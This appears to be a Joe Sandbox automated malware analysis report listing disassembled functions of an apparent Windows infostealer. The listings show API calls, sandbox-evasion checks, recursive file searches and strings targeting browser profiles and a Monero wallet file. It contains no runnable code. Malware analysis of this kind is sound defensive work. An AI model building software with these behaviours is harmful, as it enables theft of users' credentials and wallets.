                                    • Opcode ID: d919b37c2cdf3ea38c15efb8b69d078ac3c29b461efd1989c3fbaa1d1830c5d8
                                    • Instruction ID: 827dfd3257df782781c07b994c4be162951b7d82001af821b1c773ef57daae02
                                    • Opcode Fuzzy Hash: d919b37c2cdf3ea38c15efb8b69d078ac3c29b461efd1989c3fbaa1d1830c5d8
                                    • Instruction Fuzzy Hash: 3C016DB0D50308BEEB10EFE0DC49B9EBB78BB54705F288058EB05B62C0D77556459B99
                                    Function 00C46AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1450 c46af3 1451 c46b0a 1450->1451 1453 c46b0c-c46b22 call c46920 call c45b10 CloseHandle ExitProcess 1451->1453 1454 c46aba-c46ad7 call c4aad0 OpenEventA 1451->1454 1460 c46af5-c46b04 CloseHandle Sleep 1454->1460 1461 c46ad9-c46af1 call c4aad0 CreateEventA 1454->1461 1460->1451 1461->1453
                                    APIs
                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,019D8830,?,00C5110C,?,00000000,?,00C51110,?,00000000,00C50AEF), ref: 00C46ACA
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C46AE8
                                    • CloseHandle.KERNEL32(00000000), ref: 00C46AF9
                                    • Sleep.KERNEL32(00001770), ref: 00C46B04
                                    • CloseHandle.KERNEL32(?,00000000,?,019D8830,?,00C5110C,?,00000000,?,00C51110,?,00000000,00C50AEF), ref: 00C46B1A
                                    • ExitProcess.KERNEL32 ref: 00C46B22
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                    • String ID:
                                    • API String ID: 941982115-0
                                    • Opcode ID: 4949f813d2fe20f6099ffc16aea377a723c3ce32d236ec39437ed7c02a325574
                                    • Instruction ID: c17c8fc7fd6d950a1b9e7ee261f4348e56015d41bcc0d20ee3862ea7cc09cdf6
                                    • Opcode Fuzzy Hash: 4949f813d2fe20f6099ffc16aea377a723c3ce32d236ec39437ed7c02a325574
                                    • Instruction Fuzzy Hash: 31F05E70940219AFE700EBA1DC0ABBD7B74FB05701F144925F516B11C5CBB05584FA6B
                                    Function 00C347B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00C34839
                                    • InternetCrackUrlA.WININET(00000000,00000000), ref: 00C34849
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CrackInternetlstrlen
                                    • String ID: <
                                    • API String ID: 1274457161-4251816714
                                    • Opcode ID: ba5f952cd25be4d0e55bc58461073e9ee18b2c5fe0c46579d138efe12390d4b9
                                    • Instruction ID: ae49a607952d6b907e8f8705630b5dc700e63bdea77f3d4a283c1b590e761bf4
                                    • Opcode Fuzzy Hash: ba5f952cd25be4d0e55bc58461073e9ee18b2c5fe0c46579d138efe12390d4b9
                                    • Instruction Fuzzy Hash: 7A214FB1D00208ABDF14DFA5EC46ADD7B75FB44320F108625F915A72D0DB706A0ADF91
                                    Function 00C451F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 00C4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C4A7E6
                                      • Part of subcall function 00C36280: InternetOpenA.WININET(00C50DFE,00000001,00000000,00000000,00000000), ref: 00C362E1
                                      • Part of subcall function 00C36280: StrCmpCA.SHLWAPI(?,019DE580), ref: 00C36303
                                      • Part of subcall function 00C36280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C36335
                                      • Part of subcall function 00C36280: HttpOpenRequestA.WININET(00000000,GET,?,019DDC28,00000000,00000000,00400100,00000000), ref: 00C36385
                                      • Part of subcall function 00C36280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00C363BF
                                      • Part of subcall function 00C36280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C363D1
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C45228
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                    • String ID: ERROR$ERROR
                                    • API String ID: 3287882509-2579291623
                                    • Opcode ID: e3871d914ac265c38273077ce9b3f5311ac331bcac5465da67ad4de592312fb5
                                    • Instruction ID: 9b9cc00b9739a899c52114db704eba6f94c09435564f422ca5af65f8b32b8d86
                                    • Opcode Fuzzy Hash: e3871d914ac265c38273077ce9b3f5311ac331bcac5465da67ad4de592312fb5
                                    • Instruction Fuzzy Hash: 27113030950108ABEB14FF61DD52AED7738BF50300F404168FC1A5B193EF30AB09EA92
                                    Function 00C31110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00C3112B
                                    • VirtualAllocExNuma.KERNEL32(00000000), ref: 00C31132
                                    • ExitProcess.KERNEL32 ref: 00C31143
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$AllocCurrentExitNumaVirtual
                                    • String ID:
                                    • API String ID: 1103761159-0
                                    • Opcode ID: 77dfba2fc83e2540d812facb73b46544bddda024934cbb0b698240a46fdb5928
                                    • Instruction ID: 4f885f13fd2e57bff0f6a39fe4e3988c18fe059a154631ea9fa5b531d114a31c
                                    • Opcode Fuzzy Hash: 77dfba2fc83e2540d812facb73b46544bddda024934cbb0b698240a46fdb5928
                                    • Instruction Fuzzy Hash: 87E08670955308FFE714EBA19C0EB0C76B8AB44B02F140055F70D761C0C6B42644969A
                                    Function 00C310A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00C310B3
                                    • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00C310F7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$AllocFree
                                    • String ID:
                                    • API String ID: 2087232378-0
                                    • Opcode ID: 94501f90c781e642ef4c93cd4a87f593a7918701cbb56573855b921afbba730a
                                    • Instruction ID: 2f1178416b60e9c5da4d8fc8a2b4b5fc8350a0c48373e1057cd390b14c69acee
                                    • Opcode Fuzzy Hash: 94501f90c781e642ef4c93cd4a87f593a7918701cbb56573855b921afbba730a
                                    • Instruction Fuzzy Hash: A8F0E2B1641208BFE718EAA4AC49FAEB7E8E705B15F300458F904E7280D5719F44DAA1
                                    Function 00C31190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00C478E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C47910
                                      • Part of subcall function 00C478E0: RtlAllocateHeap.NTDLL(00000000), ref: 00C47917
                                      • Part of subcall function 00C478E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00C4792F
                                      • Part of subcall function 00C47850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00C311B7), ref: 00C47880
                                      • Part of subcall function 00C47850: RtlAllocateHeap.NTDLL(00000000), ref: 00C47887
                                      • Part of subcall function 00C47850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00C4789F
                                    • ExitProcess.KERNEL32 ref: 00C311C6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$Process$AllocateName$ComputerExitUser
                                    • String ID:
                                    • API String ID: 3550813701-0
                                    • Opcode ID: f35501b9a6c8bfea535999b7c7bcb1a9bdfdb8afe4d3e9f58bfc0384a98e249b
                                    • Instruction ID: a4234cc96322c9c090caef9ec00301c7ae563ff523879008550502907ddae38b
                                    • Opcode Fuzzy Hash: f35501b9a6c8bfea535999b7c7bcb1a9bdfdb8afe4d3e9f58bfc0384a98e249b
                                    • Instruction Fuzzy Hash: D0E012B59143015BCA00B7B1AC0AB2E329CAB5474AF0C0939FA09F2142FB65E949A666

                                    Non-executed Functions

                                    Function 00C438B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 00C438CC
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00C438E3
                                    • lstrcat.KERNEL32(?,?), ref: 00C43935
                                    • StrCmpCA.SHLWAPI(?,00C50F70), ref: 00C43947
                                    • StrCmpCA.SHLWAPI(?,00C50F74), ref: 00C4395D
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00C43C67
                                    • FindClose.KERNEL32(000000FF), ref: 00C43C7C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                    • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                    • API String ID: 1125553467-2524465048
                                    • Opcode ID: a4b1625531b62538ad78a6576645faaa9633fd83d5fe6fb6648dc9e2e2d38a0e
                                    • Instruction ID: 404778ecc219565c922bda3c78bf3bdf61b20afa5c36fb8d50f95d3ddbbbe026
                                    • Opcode Fuzzy Hash: a4b1625531b62538ad78a6576645faaa9633fd83d5fe6fb6648dc9e2e2d38a0e
                                    • Instruction Fuzzy Hash: 04A142B1A002189FDB24EFA5DC85FEE7378FB94301F084598E51DA6141EB759B88CF62
                                    Function 00C3BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                      • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                      • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                      • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019D8B90,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                      • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                      • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                      • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                    • FindFirstFileA.KERNEL32(00000000,?,00C50B32,00C50B2B,00000000,?,?,?,00C513F4,00C50B2A), ref: 00C3BEF5
                                    • StrCmpCA.SHLWAPI(?,00C513F8), ref: 00C3BF4D
                                    • StrCmpCA.SHLWAPI(?,00C513FC), ref: 00C3BF63
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00C3C7BF
                                    • FindClose.KERNEL32(000000FF), ref: 00C3C7D1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                    • API String ID: 3334442632-726946144
                                    • Opcode ID: 251edb2f9d12c73bd8577ee3b995e580b9dea81eb5e0a1cb95bc9af32c0ca966
                                    • Instruction ID: 8d1f464f53db852cc4946b21991c02bdfbcb554744b4cd2db0ac491c5a4dfc3c
                                    • Opcode Fuzzy Hash: 251edb2f9d12c73bd8577ee3b995e580b9dea81eb5e0a1cb95bc9af32c0ca966
                                    • Instruction Fuzzy Hash: 3A426372950104ABEB14FB70DD96EED737DBF94300F404568F90AA6091EF34AB49DBA2
                                    Function 00C44910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 00C4492C
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00C44943
                                    • StrCmpCA.SHLWAPI(?,00C50FDC), ref: 00C44971
                                    • StrCmpCA.SHLWAPI(?,00C50FE0), ref: 00C44987
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00C44B7D
                                    • FindClose.KERNEL32(000000FF), ref: 00C44B92
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\%s$%s\%s$%s\*
                                    • API String ID: 180737720-445461498
                                    • Opcode ID: 0052fc76fa49e94281ad05ff2e1fd32084d39e035bfcc70c3de49b84f55f1965
                                    • Instruction ID: a352f25004cf526c3a341c9ccad46b67003784b91eb1503246c3cc379bc01c3d
                                    • Opcode Fuzzy Hash: 0052fc76fa49e94281ad05ff2e1fd32084d39e035bfcc70c3de49b84f55f1965
                                    • Instruction Fuzzy Hash: 9D6132B2510218AFDB24EBE1DC49FEE737CBB98701F044598E50DA6141EB719B89CF91
                                    Function 00C44570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00C44580
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C44587
                                    • wsprintfA.USER32 ref: 00C445A6
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00C445BD
                                    • StrCmpCA.SHLWAPI(?,00C50FC4), ref: 00C445EB
                                    • StrCmpCA.SHLWAPI(?,00C50FC8), ref: 00C44601
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00C4468B
                                    • FindClose.KERNEL32(000000FF), ref: 00C446A0
                                    • lstrcat.KERNEL32(?,019DE510), ref: 00C446C5
                                    • lstrcat.KERNEL32(?,019DD218), ref: 00C446D8
                                    • lstrlen.KERNEL32(?), ref: 00C446E5
                                    • lstrlen.KERNEL32(?), ref: 00C446F6
